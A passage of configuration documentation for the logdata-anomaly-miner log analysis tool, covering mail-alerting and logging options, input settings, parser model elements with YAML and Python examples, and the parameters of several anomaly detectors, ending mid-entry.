alerting procedure before really sending out the e-mail. In that timespan, events are collected and will be sent all using a single e-mail. .. code-block:: yaml MailAlerting.EventCollectTime: 10 MailAlerting.MinAlertGap ~~~~~~~~~~~~~~~~~~~~~~~~ * Type: Number of seconds * Default: 600 Define the minimum time between two alert e-mails in seconds to avoid spamming. All events during this timespan are collected and sent out with the next report. .. code-block:: yaml MailAlerting.MinAlertGap: 600 MailAlerting.MaxAlertGap ~~~~~~~~~~~~~~~~~~~~~~~~ * Type: Number of seconds * Default: 600 Define the maximum time between two alert e-mails in seconds. When undefined this defaults to "MailAlerting.MinAlertGap". Otherwise this will activate an exponential backoff to reduce messages during permanent error states by increasing the alert gap by 50% when more alert-worthy events were recorded while the previous gap time was not yet elapsed. .. code-block:: yaml MailAlerting.MaxAlertGap: 600 MailAlerting.MaxEventsPerMessage ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ * Type: Number of events * Default: 1000 Define how many events should be included in one alert mail at most. .. code-block:: yaml MailAlerting.MaxEventsPerMessage: 1000 LogPrefix ~~~~~~~~~ This option defines the prefix for the output of each anomaly. .. code-block:: yaml LogPrefix: '' Log.Encoding ~~~~~~~~~~~~ * Type: string * Default: 'utf-8' This option defines the encoding of the logfiles. .. code-block:: yaml Log.Encoding: 'utf-8' Log.StatisticsPeriod ~~~~~~~~~~~~~~~~~~~~ * Type: Number of seconds * Default: 3600 Defines how often to write into stat-logfiles. .. code-block:: yaml Log.StatisticsPeriod: 3600 Log.StatisticsLevel ~~~~~~~~~~~~~~~~~~~ * Type: Number of loglevel * Default: 1 Defines the loglevel for the stat logs. .. code-block:: yaml Log.StatisticsLevel: 2 Log.DebugLevel ~~~~~~~~~~~~~~ * Type: Number of loglevel * Default: 1 Defines the loglevel of the aminer debug-logfile. .. code-block:: yaml Log.DebugLevel: 2 Log.RemoteControlLogFile ~~~~~~~~~~~~~~~~~~~~~~~~ * Type: string (path to the logfile) * Default: '/var/lib/aminer/log/aminerRemoteLog.log' Defines the path of the logfile for the RemoteControl. .. code-block:: yaml Log.RemoteControlLogFile: '/var/log/aminerremotecontrol.log' Log.StatisticsFile ~~~~~~~~~~~~~~~~~~ * Type: string (path to the logfile) * Default: '/var/lib/aminer/log/statistics.log' Defines the path of the stats-file. .. code-block:: yaml Log.StatisticsFile: '/var/log/aminer-stats.log' Log.DebugFile ~~~~~~~~~~~~~~~~~~ * Type: string (path to the logfile) * Default: '/var/lib/aminer/log/aminer.log' Defines the path of the debug-log-file. .. code-block:: yaml Log.DebugFile: '/var/log/aminer.log' Log.Rotation.MaxBytes ~~~~~~~~~~~~~~~~~~~~~ * Type: number of bytes * Default: 1048576 (1 Megabyte) Defines the number of bytes before "Log.RemoteControlLogFile", "Log.StatisticsFile" and "Log.DebugFile" is rotated. .. code-block:: yaml Log.Rotation.MaxBytes: 1048576 Log.Rotation.BackupCount ~~~~~~~~~~~~~~~~~~~~~~~~ * Type: number of old logfiles * Default: 5 Defines the number of logfiles saved after rotation of "Log.RemoteControlLogFile", "Log.StatisticsFile" and "Log.DebugFile". .. code-block:: yaml Log.Rotation.BackupCount: 5 ----- Input ----- timestamp_paths ~~~~~~~~~~~~~~~ * Type: string or list of strings Parser paths to DateTimeModelElements to set timestamp of log events. .. code-block:: yaml timestamp_paths: '/model/time' .. code-block:: yaml timestamp_paths: - '/parser/model/time' - '/parser/model/type/execve/time' - '/parser/model/type/proctitle/time' - '/parser/model/type/syscall/time' - '/parser/model/type/path/time' multi_source ~~~~~~~~~~~~ * Type: boolean (True,False) * Default: False Flag to enable chronologically correct parsing from multiple input-logfiles. .. code-block:: yaml multi_source: True eol_sep ~~~~~~~ * Default: '\n' End of Line seperator for events. .. note:: Enables parsing of multiline logs. .. code-block:: yaml eol_sep: '\r\n' json_format ~~~~~~~~~~~ * Type: boolean (True,False) * Default: False Enables parsing of logs in json-format. .. code-block:: yaml json_format: True suppress_unparsed ~~~~~~~~~~~~~~~~~ * Default: False Boolean value that allows to suppress anomaly output about unparsed log atoms. .. code-block:: yaml suppress_unparsed: True ------- Parsing ------- There are some predefined standard-model-elements like *IpAddressDataModelElement*, *DateTimeModelElement*, *FixedDataModelElement* and so on. They are located in the python-source-tree of logdata-anomaly-miner. A comprehensive list of all possible standard-model-elements can be found below. Using these standard-model-elements it is possible to create custom parser models. Currently there are two methods of doing it: 1. Using a python-script that is located in */etc/aminer/conf-enabled*: .. code-block:: python """ /etc/aminer/conf-enabled/ApacheAccessParsingModel.py""" from aminer.parsing.DateTimeModelElement import DateTimeModelElement from aminer.parsing.DecimalIntegerValueModelElement import DecimalIntegerValueModelElement from aminer.parsing.DelimitedDataModelElement import DelimitedDataModelElement from aminer.parsing.FirstMatchModelElement import FirstMatchModelElement from aminer.parsing.FixedDataModelElement import FixedDataModelElement from aminer.parsing.FixedWordlistDataModelElement import FixedWordlistDataModelElement from aminer.parsing.IpAddressDataModelElement import IpAddressDataModelElement from aminer.parsing.OptionalMatchModelElement import OptionalMatchModelElement from aminer.parsing.SequenceModelElement import SequenceModelElement from aminer.parsing.VariableByteDataModelElement import VariableByteDataModelElement def get_model(): """Return a model to parse Apache Access logs from the AIT-LDS.""" alphabet = b'!"#$%&\'()*+,-./0123456789:;<>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ\\^_`abcdefghijklmnopqrstuvwxyz{|}~=[]' model = SequenceModelElement('model', [ FirstMatchModelElement('client_ip', [ IpAddressDataModelElement('client_ip'), FixedDataModelElement('localhost', b'::1') ]), FixedDataModelElement('sp1', b' '), VariableByteDataModelElement('client_id', alphabet), FixedDataModelElement('sp2', b' '), VariableByteDataModelElement('user_id', alphabet), FixedDataModelElement('sp3', b' ['), DateTimeModelElement('time', b'%d/%b/%Y:%H:%M:%S'), FixedDataModelElement('sp4', b' +'), DecimalIntegerValueModelElement('tz'), FixedDataModelElement('sp5', b'] "'), FirstMatchModelElement('fm', [ FixedDataModelElement('dash', b'-'), SequenceModelElement('request', [ FixedWordlistDataModelElement('method', [ b'GET', b'POST', b'PUT', b'HEAD', b'DELETE', b'CONNECT', b'OPTIONS', b'TRACE', b'PATCH']), FixedDataModelElement('sp6', b' '), DelimitedDataModelElement('request', b' ', b'\\'), FixedDataModelElement('sp7', b' '), DelimitedDataModelElement('version', b'"'), ]) ]), FixedDataModelElement('sp8', b'" '), DecimalIntegerValueModelElement('status_code'), FixedDataModelElement('sp9', b' '), DecimalIntegerValueModelElement('content_size'), OptionalMatchModelElement( 'combined', SequenceModelElement('combined', [ FixedDataModelElement('sp10', b' "'), DelimitedDataModelElement('referer', b'"', b'\\'), FixedDataModelElement('sp11', b'" "'), DelimitedDataModelElement('user_agent', b'"', b'\\'), FixedDataModelElement('sp12', b'"'), ])), ]) return model This parser can be used as "type" in **/etc/aminer/config.yml**: .. code-block:: yaml Parser: - id: 'apacheModel' type: ApacheAccessModel name: 'apache' .. warning:: Please do not create files with the ending "ModelElement.py" in /etc/aminer/conf-enabled! 2. Configuring the parser-model inline in **/etc/aminer/config.yml** .. code-block:: yaml Parser: - id: host_name_model type: VariableByteDataModelElement name: 'host' args: '-.01234567890abcdefghijklmnopqrstuvwxyz:' - id: identity_model type: VariableByteDataModelElement name: 'ident' args: '-.01234567890abcdefghijklmnopqrstuvwxyz:' - id: user_name_model type: VariableByteDataModelElement name: 'user' args: '0123456789abcdefghijklmnopqrstuvwxyz.-' - id: new_time_model type: DateTimeModelElement name: 'time' date_format: '[%d/%b/%Y:%H:%M:%S +0000]' - id: sq3 type: FixedDataModelElement name: 'sq3' args: ' "' - id: request_method_model type: FixedWordlistDataModelElement name: 'method' args: - 'GET' - 'POST' - 'PUT' - 'HEAD' - 'DELETE' - 'CONNECT' - 'OPTIONS' - 'TRACE' - 'PATCH' - id: request_model type: VariableByteDataModelElement name: 'request' args: '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ.-/()[]{}!$%&=?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]()^_`abcdefghijklmnopqrstuvwxyz{|}~' - id: timestamp_model type: DateTimeModelElement name: 'timestamp' date_format: '%Y-%m-%dT%H:%M:%S+00:00' - id: optional_model type: OptionalMatchModelElement name: 'opt' args: timestamp_model - id: 'START' start: True type: JsonStringModelElement name: accesslog strict: True ignore_null: False key_parser_dict: "time": optional_model "agent": agent .. warning:: This parser does not work with multiline json-logs .. note:: Use OptionalMatchModelElement to make the subparser optional with null-values OptionalMatchModelElement ~~~~~~~~~~~~~~~~~~~~~~~~~ This model allows to define optional model elements. * **args**: the id of the optional element that will be skipped if it does not match .. code-block:: yaml Parser: - id: user type: FixedDataModelElement name: 'User' args: 'User ' - id: opt type: OptionalMatchModelElement name: 'opt' args: user RepeatedElementDataModelElement ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ This model allows to define elements that repeat a number of times. * **args**: a string or list containing the following parameters: 1. repeated_element: id of element which is repeated 2. min_repeat: minimum amount of times the repeated element has to occur, default is 1 3. max_repeat: minimum amount of times the repeated element has to occur, default is 1048576 .. code-block:: yaml Parser: - id: delimitedDataModelElement type: DelimitedDataModelElement name: 'DelimitedDataModelElement' consume_delimiter: True delimiter: ';' - id: repeatedElementDataModelElement type: RepeatedElementDataModelElement name: 'RepeatedElementDataModelElement' args: - sequenceModelElement - 3 SequenceModelElement ~~~~~~~~~~~~~~~~~~~~ This model defines a sequence of elements that all have to match. * **args**: a list of elements that form the sequence .. code-block:: yaml Parser: - id: user type: FixedDataModelElement name: 'User' args: 'User ' - id: username type: DelimitedDataModelElement name: 'Username' consume_delimiter: True delimiter: ' ' - id: ip type: IpAddressDataModelElement name: 'IP' - id: seq type: SequenceModelElement name: 'seq' args: - user - username - ip VariableByteDataModelElement ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ This model defines a string of character bytes with variable length from a given alphabet. * **args**: string specifying the allowed characters .. code-block:: yaml Parser: - id: version type: VariableByteDataModelElement name: 'version' args: '0123456789.' WhiteSpaceLimitedDataModelElement ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ This model defines a string that is delimited by a white space. .. code-block:: yaml Parser: - id: whiteSpaceLimitedDataModelElement type: WhiteSpaceLimitedDataModelElement name: 'WhiteSpaceLimitedDataModelElement' XmlModelElement ~~~~~~~~~~~~~~~~ This model defines a xml-formatted log line. This model is usually used as a start element and with xml_format: True set in the Input section of the config.yml. * **key_parser_dict**: a dictionary of keys as defined in the xml-formatted logs and appropriate parser models as values * **attribute_prefix**: a string that marks the element as an attribute of an element in the xml schema. Default: "+" * **optional_attribute_prefix**: a string that can be used as a prefix for attributes that are optional in the xml schema. Default: "_" * **empty_allowed_prefix**: a string that can be used as a prefix for elements where empty values are allowed in the xml schema. Default: "?" * **xml_header_expected**: defines whether a xml-header is expected. Default: False .. code-block:: yaml Parser: - id: id type: DecimalIntegerValueModelElement name: 'id' - id: opt type: FixedDataModelElement name: 'opt' args: 'text' - id: to type: AnyByteDataModelElement name: 'to' - id: from type: AnyByteDataModelElement name: 'from' - id: heading type: AnyByteDataModelElement name: 'heading' - id: text1 type: AnyByteDataModelElement name: 'text1' - id: text2 type: AnyByteDataModelElement name: 'text2' - id: xml start: True type: XmlModelElement name: 'model' xml_header_expected: True key_parser_dict: messages: - note: +id: id _+opt: opt to: to from: from ?heading: heading body: text1: text1 text2: text2 --------- Analysing --------- All detectors have the following parameters and may have additional specific parameters that are defined in the respective sections. * **id**: must be a unique string * **type**: must be an existing Analysis component (required) .. _AllowlistViolationDetector: AllowlistViolationDetector ~~~~~~~~~~~~~~~~~~~~~~~~~~ This module defines a detector for log atoms not matching any allowlisted rule. * **allowlist_rules**: list of rules executed in same way as inside Rules.OrMatchRule.list of rules executed in same way as inside Rules.OrMatchRule (required, list of strings, defaults to empty list). * **suppress**: a boolean that suppresses anomaly output of that detector when set to True (boolean, defaults to False). * **output_event_handlers**: a list of event handler identifiers that the detector should forward the anomalies to (list of strings, defaults to empty list). * **output_logline**: a boolean that specifies whether full log event parsing information should be appended to the anomaly when set to True (boolean, defaults to False). .. code-block:: yaml Analysis: - type: PathExistsMatchRule id: path_exists_match_rule1 path: "/model/LoginDetails/PastTime/Time/Minutes" - type: ValueMatchRule id: value_match_rule path: "/model/LoginDetails/Username" value: "root" - type: OrMatchRule id: or_match_rule sub_rules: - "path_exists_match_rule1" - "value_match_rule" - type: AllowlistViolationDetector id: Allowlist allowlist_rules: - "or_match_rule" .. seealso:: :ref:`MatchRules` CharsetDetector ~~~~~~~~~~~~~~~ This detector generates anomalies for new characters in parsed elements and extends the allowed alphabet when learning is active. * **paths** parser paths of values to be analyzed; multiple paths mean that all values occurring in these paths are considered for character detection (required, list of strings). * **id_path_list** list of strings that specify group identifiers for which alphabets should be learned (list of strings, defaults to empty list). * **persistence_id** the name of the file where the learned models are stored (string, defaults to "Default"). * **learn_mode** specifies whether value ranges should be extended when values outside of ranges are observed (boolean). * **output_logline** specifies whether the full parsed log atom should be provided in the output (boolean). * **ignore_list**: a list of parser paths that are ignored for analysis by this detector (list of strings, defaults to empty list). * **constraint_list**: a list of parser paths that the detector will be constrained to, i.e., other branches of the parser tree are ignored (list of strings, defaults to empty list). * **suppress**: a boolean that suppresses anomaly output of that detector when set to True (boolean, defaults to False). * **output_event_handlers**: a list of event handler identifiers that the detector should forward the anomalies to (list of strings, defaults to empty list). .. code-block:: yaml Analysis: - type: 'CharsetDetector' paths: - '/parser/value' learn_mode: True EnhancedNewMatchPathValueComboDetector ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ In addition to detecting new value combination (see NewMatchPathValueComboDetector), this detector also stores combo occurrence times and amounts, and allows to execute functions on tuples that need to be defined in the python code first. * **paths**: the list of values to extract from each match to create the value combination to be checked (required, list of strings). * **allow_missing_values**: when set to True, the detector will also use matches, where one of the paths from target_path_list does not refer to an existing parsed data object (boolean, defaults to False). * **tuple_transformation_function**: when not None, this function will be invoked on each extracted value combination list to transform it. It may modify the list directly or create a new one to return it (string, defaults to None). * **learn_mode**: when set to True, this detector will report a new value only the first time before including it in the known values set automatically (boolean). * **persistence_id**: the name of the file where the learned models are stored (string, defaults to "Default"). * **suppress**: a boolean that suppresses anomaly output of that detector when set to True (boolean, defaults to False). * **output_event_handlers**: a list of event handler identifiers that the detector should forward the anomalies to (list of strings, defaults to empty list). * **output_logline**: a boolean that specifies whether full log event parsing information should be appended to the anomaly when set to True (boolean, defaults to False). .. code-block:: yaml Analysis: - type: EnhancedNewMatchPathValueComboDetector id: EnhancedNewValueCombo paths: - "/model/DailyCron/UName" - "/model/DailyCron/JobNumber" tuple_transformation_function: "demo" learn_mode: True EntropyDetector ~~~~~~~~~~~~~~ This detector monitors and learns occurrence probabilities of character pairs in values. Many unlikely character pairs in values suggest that they are randomly generated or not fitting the learned character patterns. * **paths** parser paths of values to be analyzed. Multiple paths mean that all values occurring in these paths are considered as if they occur in the same field (required, list of strings). * **prob_thresh** limit for the average probability of character pairs for which anomalies are reported (float, defaults to 0.05). * **default_probs** initializes the probabilities with default values from https://github.com/markbaggett/freq (boolean, defaults to False). * **skip_repetitions** boolean that determines whether only distinct values are used for character pair counting. This counteracts the problem of imbalanced word frequencies that distort the frequency table generated in a single aminer run (boolean, defaults to False). * **persistence_id** name of persistency document (string, defaults to "Default"). * **learn_mode** when set to True, the detector will extend the table of character pair frequencies based on new values (boolean). * **output_logline** specifies whether the full parsed log atom should be provided in the output (boolean, defaults to False). * **suppress**: a boolean that suppresses anomaly output of that detector when set to True (boolean, defaults to False). * **output_event_handlers**: a list of event handler identifiers that the detector should forward the anomalies to (list of strings, defaults to empty list). .. code-block:: yaml Analysis: - type: 'EntropyDetector' paths: - '/parser/value' prob_thresh: 0.05 default_freqs: false skip_repetitions: false learn_mode: True EventCorrelationDetector ~~~~~~~~~~~~~~~~~~~~~~~~ This module defines an evaluator and generator for event rules. The overall idea of generation is 1. For each processed event A, randomly select another event B occurring within queue_delta_time. 2. If B chronologically occurs after A, create the hypothesis A => B (observing event A implies that event B must be observed within current_time+queue_delta_time). If B chronologically occurs before A, create the hypothesis B <= A (observing event A implies that event B must be observed within currentTime-queueDeltaTime). 3. Observe for a long time (max_observations) whether the hypothesis holds. 4. If the hypothesis holds, transform it to a rule. Otherwise, discard the hypothesis. * **paths**: a list of paths where values or value combinations used for correlation occur. If this parameter is not set, correlation is done on event types instead (list of strings, defaults to empty list). * **output_event_handlers**: a list of event handler identifiers that the detector should forward the anomalies to (list of strings, defaults to empty list). * **max_hypotheses** maximum amount of hypotheses and rules hold in memory (integer, defaults to 1000). * **hypothesis_max_delta_time** time span in seconds of events considered for hypothesis generation (float, defaults to 5.0). * **generation_probability** probability in [0, 1] that currently processed log line is considered for hypothesis with each of the candidates (float, defaults to 1.0). * **generation_factor** likelihood in [0, 1] that currently processed log line is added to the set of candidates for hypothesis generation (float, defaults to 1.0). * **max_observations** maximum amount of evaluations before hypothesis is transformed into a rule or discarded or rule is evaluated (integer, defaults to 500). * **p0** expected value for hypothesis evaluation distribution (float, defaults to 0.9). * **alpha** confidence value for hypothesis evaluation (float, defaults to 0.05). * **candidates_size** maximum number of stored candidates used for hypothesis generation (integer, defaults to 10). * **hypotheses_eval_delta_time** duration in seconds between hypothesis evaluation phases that remove old hypotheses that are likely to remain unused (float, 120.0). * **delta_time_to_discard_hypothesis** time span in seconds required for old hypotheses to be discarded (float, defaults to 180.0). * **check_rules_flag** specifies whether existing rules are evaluated (boolean, defaults to True). * **ignore_list**: a list of parser paths that are ignored for analysis by this detector (list of strings, defaults to empty list). * **constraint_list**: a list of parser paths that the detector will be constrained to, i.e., other branches of the parser tree are ignored (list of strings, defaults to empty list). * **output_logline**: a boolean that specifies whether full log event parsing information should be appended to the anomaly when set to True (boolean, defaults to False). * **persistence_id**: the name of the file where the learned models are stored (string, defaults to "Default"). * **suppress**: a boolean that suppresses anomaly output of that detector when set to True (boolean, defaults to False). * **learn_mode**: specifies whether new hypotheses and rules are generated (boolean). .. code-block:: yaml Analysis: - type: EventCorrelationDetector id: EventCorrelationDetector check_rules_flag: True hypothesis_max_delta_time: 1.0 learn_mode: True EventCountClusterDetector ~~~~~~~~~~~~~~~~~~~~~~~~~ This module defines a detector that clusters count vectors of event and value occurrences. * **paths** parser paths of values to be analyzed. Multiple paths mean that values are analyzed by their combined occurrences. When no paths are specified, the events given by the full path list are analyzed (list of strings, defaults to empty list). * **output_event_handlers** for handling events, e.g., print events to stdout (list of strings, defaults to empty list). * **window_size** the length of the time window for counting in seconds (float, defaults to 600). * **id_path_list** parser paths of values for which separate count vectors should be generated (list of strings, defaults to empty list). * **num_windows** the number of vectors stored in the models (integer, defaults to 50). * **confidence_factor** minimum similarity threshold in range [0, 1] for detection (float, defaults to 0.33). * **idf** when true, value counts are weighted higher when they occur with fewer id_paths (requires that id_path_list is set) (boolean, defaults to False). * **norm** when true, count vectors are normalized so that only relative occurrence frequencies matter for detection (boolean, defaults to False). * **add_normal** when true, count vectors are also added to the model when they exceed the similarity threshold (boolean, defaults to False). * **check_empty_windows** when true, empty count vectors are generated for time windows without event occurrences (boolean, defaults to False). * **persistence_id** name of persistence document (string, defaults to "Default"). * **output_logline** specifies whether the full parsed log atom should be provided in the output (boolean, defaults to False). * **ignore_list list** of paths that are not considered for analysis, i.e., events that contain one of these paths are omitted. The default value is [] as None is not iterable (list of strings, defaults to empty list). * **constraint_list** list of paths that have to be present in the log atom to be analyzed (list of strings, defaults to empty list). * **stop_learning_time** switch the learn_mode to False after the time (float, defaults to None). * **stop_learning_no_anomaly_time** switch the learn_mode to False after no anomaly was detected for that time (float, defaults to None). .. code-block:: yaml Analysis: - id: "eccd" type: "EventCountClusterDetector" window_size: 10 idf: True confidence_factor: 0.7 id_path_list: - '/parser/idp' paths: - '/parser/val' EventFrequencyDetector ~~~~~~~~~~~~~~~~~~~~~~ This module defines a detector for event and value frequency deviations. * **paths** parser paths of values to be analyzed. Multiple paths mean that values are analyzed by their combined occurrences. When no paths are specified, the events given by the full path list are analyzed (list of strings, defaults to empty list). * **scoring_path_list** parser paths of values to be analyzed by following event handlers like the ScoringEventHandler. Multiple paths mean that values are analyzed by their combined occurrences. * **unique_path_list** parser paths of values where only unique value occurrences should be counted for every value occurring at paths. * **output_event_handlers** for handling events, e.g., print events to stdout (list of strings, defaults to empty list). * **window_size** the length of the time window for counting in seconds (float, defaults to 600). * **num_windows** the number of previous time windows considered for expected frequency estimation (integer, defaults to 50). * **confidence_factor** defines range of tolerable deviation of measured frequency from expected frequency according to occurrences_mean +- occurrences_std / self.confidence_factor. Default value is 0.33 = 3 * sigma deviation. confidence_factor must be in range [0, 1] (float, defaults to 0.33). * **empty_window_warnings** whether anomalies should be generated for too small window sizes. * **early_exceeding_anomaly_output** states if a anomaly should be raised the first time the appearance count exceedes the range. * **set_lower_limit** sets the lower limit of the frequency test to the specified value. * **set_upper_limit** sets the upper limit of the frequency test to the specified value. * **season** the seasonality/periodicity of the time-series in seconds. * **learn_mode** specifies whether new frequency measurements override ground truth frequencies (boolean). * **output_logline** specifies whether the full parsed log atom should be provided in the output (boolean, defaults to False). * **ignore_list** list of paths that are not considered for analysis, i.e., events that contain one of these paths are omitted (list of strings, defaults to empty list). * **constraint_list** list of paths that have to be present in the log atom to be analyzed (list of strings, defaults to empty list). * **suppress**: a boolean that suppresses anomaly output of that detector when set to True (boolean, defaults to False). * **persistence_id**: the name of the file where the learned models are stored (string, defaults to "Default"). .. code-block:: yaml Analysis: - type: EventFrequencyDetector id: EventFrequencyDetector window_size: 10 EventSequenceDetector ~~~~~~~~~~~~~~~~~~~~~ This module defines an detector for event and value sequences. The concept is based on STIDE which was first published by Forrest et al. * **paths** parser paths of values to be analyzed. Multiple paths mean that values are analyzed by their combined occurrences. When no paths are specified, the events given by the full path list are analyzed (list of strings, defaults to empty list). * **output_event_handlers** for handling events, e.g., print events to stdout (list of strings, defaults to empty list). * **id_path_list** one or more paths that specify the trace of the sequence detection, i.e., incorrect sequences that are generated by interleaved events can be avoided when event sequence identifiers are available (list of strings, defaults to empty list). * **seq_len** the length of the sequences to be learned (larger lengths increase precision, but may overfit the data). (integer, defaults to 3). * **learn_mode** specifies whether newly observed sequences should be added to the learned model (boolean). * **output_logline** specifies whether the full parsed log atom should be provided in the output (boolean, defaults to False). * **ignore_list** list of paths that are not considered for analysis, i.e., events that contain one of these paths are omitted (list of strings, defaults to empty list). * **constraint_list** list of paths that have to be present in the log atom to be analyzed (list of strings, defaults to empty list). * **suppress**: a boolean that suppresses anomaly output of that detector when set to True (boolean, defaults to False). * **persistence_id**: the name of the file where the learned models are stored (string, defaults to "Default"). .. code-block:: yaml Analysis: - type: EventSequenceDetector id: EventSequenceDetector seq_len: 4 paths: - '/model/type/syscall/syscall' id_path_list: - '/model/type/syscall/id' EventTypeDetector ~~~~~~~~~~~~~~~~~ This component serves as a basis for the VariableTypeDetector, VariableCorrelationDetector, TSAArimaDetector and PathArimaDetector. It saves a list of the values to the single paths and tracks the time for the TSAArimaDetector. * **paths** parser paths of values to be analyzed (list of strings, defaults to empty list). * **id_path_list** one or more paths that specify the trace of the sequence detection, i.e., incorrect sequences that are generated by interleaved events can be avoided when event sequence identifiers are available (list of strings, defaults to empty list). * **allow_missing_id** specifies whether log atoms without id path should be omitted (boolean, defaults to False. only if id path is set). * **allowed_id_tuples** list of the allowed id tuples. Log atoms with id tuples not in this list are not analyzed, when this list is not empty. * **persistence_id** the name of the file where the learned models are stored (string, defaults to "Default"). * **max_num_vals** maximum number of lines in the value list before it is reduced (integer, defaults to 1500). * **min_num_vals** number of the values which the list is being reduced to (integer, defaults to 1000). * **save_values** if False the values of the paths are not saved for further analysis. The values are not needed for the TSAArimaDetector (boolean, defaults to True). .. code-block:: yaml Analysis: - type: 'EventTypeDetector' id: ETD id_path_list: - '/model/type/syscall/id' allow_missing_id: True save_values: False .. _HistogramAnalysis: HistogramAnalysis ~~~~~~~~~~~~~~~~~ This component performs a histogram analysis on one or more input properties. The properties are parsed values denoted by their parsing path. Those values are then handed over to the selected "binning function", that calculates the histogram bin. * Binning: Binning can be done using one of the predefined binning functions or by creating own subclasses from "HistogramAnalysis.BinDefinition". * LinearNumericBinDefinition: Binning function working on numeric values and sorting them into bins of same size. * ModuloTimeBinDefinition: Binning function working on parsed datetime values but applying a modulo function to them. This is useful for analysis of periodic activities. * **histogram_defs**: list of tuples. First element of the tuple contains the target property path to analyze. The second element contains the id of a bin_definition(LinearNumericBinDefinition or ModuloTimeBinDefinition). List(strings) **Required** * **report_interval**: Report_interval delay in seconds between creaton of two reports. The parameter is applied to the parsed record data time, not the system time. Hence reports can be delayed when no data is received. Integer(min: 1) **Required** * **reset_after_report_flag**: Zero counters after the report was sent. Boolean(Default: true) * **persistence_id'**: the name of the file where the learned models are stored. String(Default: 'Default') * **output_logline**: specifies whether the full parsed log atom should be provided in the output. Boolean(Default: false) * **output_event_handlers**: List of event-handler-id to send the report to. List(strings) * **suppress**: a boolean that suppresses anomaly output of that detector when set to True. Boolean(Default: false) .. code-block:: yaml Analysis: - type: LinearNumericBinDefinition id: linear_numeric_bin_definition lower_limit: 50 bin_size: 5 bin_count: 20 outlier_bins_flag: True - type: HistogramAnalysis id: HistogramAnalysis histogram_defs: [["/model/RandomTime/Random", "linear_numeric_bin_definition"]] report_interval: 10 .. _PathDependentHistogramAnalysis: PathDependentHistogramAnalysis ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ This component creates a histogram for only a single input property, e.g. an IP address, but for each group of correlated match pathes. Assume there two pathes that include the input property but they separate after the property was found on the path. This might be for example the client IP address in ssh log atoms, where the parsing path may split depending if this was a log atom for a successful login, logout or some error. This analysis component will then create separate histograms, one for the path common to all atoms and one for each disjunct part of the subpathes found. The component uses the same binning functions as the standard HistogramAnalysis.HistogramAnalysis, see documentation there. * **path**: The property-path. String(Required) * **bin_definition**: The id of a bin_definition(LinearNumericBinDefini tion or ModuloTimeBinDefinition). String(Required) * **report_interval**: Report_interval delay in seconds between creaton of two reports. The parameter is applied to the parsed record data time, not the system time. Hence reports can be delayed when no data is received. Integer(min: 1) * **reset_after_report_flag**: Zero counters after the report was sent. Boolean(Default: true) * **persistence_id'**: the name of the file where the learned models are stored. String(Default: 'Default') * **output_logline**: specifies whether the full parsed log atom should be provided in the output. Boolean(Default: false) * **output_event_handlers**: List of event-handler-id to send the report to List(strings). * **suppress**: a boolean that suppresses anomaly output of that detector when set to True. Boolean(Default: false) .. code-block:: yaml Analysis: - type: ModuloTimeBinDefinition id: modulo_time_bin_definition modulo_value: 86400 time_unit: 3600 lower_limit: 0 bin_size: 1 bin_count: 24 outlier_bins_flag: True - type: PathDependentHistogramAnalysis id: PathDependentHistogramAnalysis path: "/model/RandomTime" bin_definition: "modulo_time_bin_definition" report_interval: 10 LinearNumericBinDefinition ~~~~~~~~~~~~~~~~~~~~~~~~~~ Binning function working on numeric values and sorting them into bins of same size. * **lower_limit**: Start on lowest bin. Integer or Float **Required** * **bin_size**: Size of bin in reporting units. Integer(min 1) **Required** * **bin_count**: Number of bins. Integer(min 1) **Required** * **outlier_bins_flag**: Disable outlier bins. Boolean. Default: False * **output_event_handlers**: List of handlers to send the report to. * **suppress**: a boolean that suppresses anomaly output of that detector when set to True. .. code-block:: yaml Analysis: - type: LinearNumericBinDefinition id: linear_numeric_bin_definition lower_limit: 50 bin_size: 5 bin_count: 20 outlier_bins_flag: True .. seealso:: :ref:`HistogramAnalysis` ModuloTimeBinDefinition ~~~~~~~~~~~~~~~~~~~~~~~ Binning function working on parsed datetime values but applying a modulo function to them. This is useful for analysis of periodic activities. * **modulo_value**: Modulo values in seconds. * **time_unit**: Division factor to get down to reporting unit * **lower_limit**: Start on lowest bin. Integer or Float **Required** * **bin_size**: Size of bin in reporting units. Size of bin in reporting units. Integer(min 1) **Required** * **bin_count**: Number of bins. Integer(min 1) **Required** * **outlier_bins_flag**: Disable outlier bins. Boolean. Default: False * **output_event_handlers**: List of handlers to send the report to. * **suppress**: a boolean that suppresses anomaly output of that detector when set to True. .. code-block:: yaml Analysis: - type: ModuloTimeBinDefinition id: modulo_time_bin_definition modulo_value: 86400 time_unit: 3600 lower_limit: 0 bin_size: 1 bin_count: 24 outlier_bins_flag: True .. seealso:: :ref:`PathDependentHistogramAnalysis` MatchFilter ~~~~~~~~~~~ This component creates events for specified paths and values. * **paths**: List of paths defined as strings(Required) * **value_list**: List of values(Required) * **output_logline**: Defines if logline should be added to the output. Boolean(Default: False) * **output_event_handlers**: List of strings with id's of the event_handlers * **suppress**: a boolean that suppresses anomaly output of that detector when set to True. .. code-block:: yaml Analysis: - type: MatchFilter id: MatchFilter paths: - "/model/Random" value_list: - 1 - 10 - 100 MatchValueAverageChangeDetector ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ This detector calculates the average of a given list of values to monitor. Reports are generated if the average of the latest diverges significantly from the values observed before. * **timestamp_path**: Use this path value for timestamp based bins. String (**required**) * **paths**: List of match paths to analyze in this detector. List of strings( **required**) * **min_bin_elements**: Evaluate the latest bin only after at least that number of elements was added to it. Integer, min: 1 (**required**) * **min_bin_time**: Evaluate the latest bin only when the first element is received after min_bin_time has elapsed. Integer, min: 1 (**required**) * **avg_factor** the maximum allowed deviation for the average value before an anomaly is raised. Float, default: 1 * **var_factor** the maximum allowed deviation for the variance of the value before an anomaly is raised. Float, default: 2 * **debug_mode**: Enables debug output. Boolean(Default: False) * **persistence_id**: The name of the file where the learned models are stored. String * **output_logline**: Defines if logline should be added to the output. Boolean(Default: False) * **output_event_handlers**: List of strings with id's of the event_handlers * **suppress**: A boolean that suppresses anomaly output of that detector when set to True. .. code-block:: yaml Analysis: - type: MatchValueAverageChangeDetector id: 